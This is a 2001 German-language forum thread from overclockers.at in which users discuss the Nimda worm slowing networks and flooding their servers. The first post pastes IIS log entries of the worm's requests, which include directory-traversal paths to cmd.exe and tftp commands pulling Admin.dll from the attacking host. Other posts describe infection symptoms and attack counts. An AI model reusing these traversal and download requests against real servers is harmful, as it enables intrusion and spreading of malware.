"We are back" « oc.at

F***king Nimba

The Red Guy 19.09.2001 - 14:19 2205 43
Posts

The Red Guy

Untitled
Avatar
Registered: Jul 2001
Location: Transdanubia
Posts: 3121
Der Virus hat sich ja wieder toll im Chello-Netz verbreitet.

Die Logfiles vom Firmenwebserver gehen schon über mit solchen requests:

2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/root.exe /c+dir 404 HTTP/1.0 www -
2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /MSADC/root.exe /c+dir 403 HTTP/1.0 www -
2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 HTTP/1.0 www -
2001-09-19 00:03:59 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 HTTP/1.0 www -
2001-09-19 00:04:00 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 HTTP/1.0 www -
2001-09-19 00:04:03 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20c:\Admin.dll 502 HTTP/1.0 www -
2001-09-19 00:04:03 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20d:\Admin.dll 502 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20e:\Admin.dll 502 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../Admin.dll - 500 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 HTTP/1.0 www -
2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20c:\Admin.dll 502 HTTP/1.0 www -


Macht schon nimma Spass. :(

Surfen ist heute ein einziges Warten. Alles wie tot.

Langsam sollte man sich echt was wegen den selbstreplizierenden Viren überlegen.

noledge

CWNE #540
Avatar
Registered: Apr 2001
Location: ::1
Posts: 6838
ich hab auf meiner linux-kiste mindestens 30 zugriffe / minute

der is ja viel ärger als code red

noledge

Redphex

Legend
RabbitOfNegativeEuphoria
Registered: Mar 2000
Location: Macrodata Refine..
Posts: 11815
hmm .. mal wieder den apache aufdrehn und schaun was da bei mir so geht ..

HaBa

Vereinsmitglied
Dr. Funkenstein
Avatar
Registered: Mar 2001
Location: St. Speidl / Gle..
Posts: 19769
Interessant, entweder ist meine Firewall im Popsch oder .....

Keinen einzigen Angriff gibts bis jetzt zu verzeichnen.

noledge

CWNE #540
Avatar
Registered: Apr 2001
Location: ::1
Posts: 6838
is blöde is das de angriffe nix gleiches in der url haben, da kammas ned gscheid zählen :(

noledge

Ctrl-Alt-Del

Freund der 4 Ringe!
Avatar
Registered: Feb 2001
Location: Ländle
Posts: 3058
In wie weit müsste ich das Teil bemerken?
Bei uns in der Firma ist nix los... kein Virus/Wurm weit und breit.

Hmmm langweilig! :D

The Red Guy

Untitled
Avatar
Registered: Jul 2001
Location: Transdanubia
Posts: 3121
@haba: wenn deine Firewall den Port 80 offen hat, wirst nichts merken, weil die Requests sind ja im Prinzip ganz normale Zugriffe auf den Webserver wie schon beim Code Red.

@noledge: grep mal nach admin.dll und cmd.exe und addiere sie.

The Red Guy

Untitled
Avatar
Registered: Jul 2001
Location: Transdanubia
Posts: 3121
Zitat von Ctrl-Alt-Del
In wie weit müsste ich das Teil bemerken?
Bei uns in der Firma ist nix los... kein Virus/Wurm weit und breit.

Hmmm langweilig! :D


In den Root-Verzeichnissen deiner Partitions befindet sich auf einmal die admin.dll. du hast extrem hohen traffic im netz. Mails werden verschickt mit diversen Files. Du hast plötzlich neue shares auf deinen Rechnern...

Genaue info gibts hier bei McAfee.

HaBa

Vereinsmitglied
Dr. Funkenstein
Avatar
Registered: Mar 2001
Location: St. Speidl / Gle..
Posts: 19769
Jetzt gehts looooos, jetzt gehts loooooos!

Naja, man muß eine Weile verbunden sein, dann kommen einige.

So ca. ein Angreifer pro Minute mit 3 bis 6 Angriffen.
Bearbeitet von HaBa am 19.09.2001, 15:06

Ctrl-Alt-Del

Freund der 4 Ringe!
Avatar
Registered: Feb 2001
Location: Ländle
Posts: 3058
Zitat von The Red Guy
In den Root-Verzeichnissen deiner Partitions befindet sich auf einmal die admin.dll. du hast extrem hohen traffic im netz. Mails werden verschickt mit diversen Files. Du hast plötzlich neue shares auf deinen Rechnern...

Genaue info gibts hier bei McAfee.

Danke!
Klingt nett! :(

noledge

CWNE #540
Avatar
Registered: Apr 2001
Location: ::1
Posts: 6838
lol 5608 angriffe

code red hab ich bis jetzt 1800

noledge

noledge

CWNE #540
Avatar
Registered: Apr 2001
Location: ::1
Posts: 6838
@red guy root.exe ned vergessen...

noledge

BeatMaster

Mountainbiker
Registered: Feb 2001
Location: 2301
Posts: 777
Na ja in Unserer Firma scheut es gar nicht gut aus *g* - Kollegen haben die Nacht durchgearbeitet - haben es aber noch immer nicht in den Griff bekommen - Niemand kann auf Unserer Server von ausserhalb zugreifen - SAP R/2, SAP R/3, Exchange,....usw...

*g*

The Red Guy

Untitled
Avatar
Registered: Jul 2001
Location: Transdanubia
Posts: 3121
Der Witz dieses mal ist ja, daß du nicht unbedingt einen IIS brauchst.

Wenn du mit einem ungepatchen IE auf eine Homepage mit infizierten IIS gehst, dann kannst dir auch schon gratulieren. Und weils so lustig ist, verwendet er gleich dein Outlook auch.

Und flugs hast dus auf jedem rechner im büro.

spunz

Elder
Elder
Avatar
Registered: Aug 2000
Location: achse des bösen
Posts: 11291
tjo, alle dau´s haben wieder was gelernt. ie sux :p iis sux :p outlook sux :p
Kontakt | Unser Forum | Über overclockers.at | Impressum | Datenschutz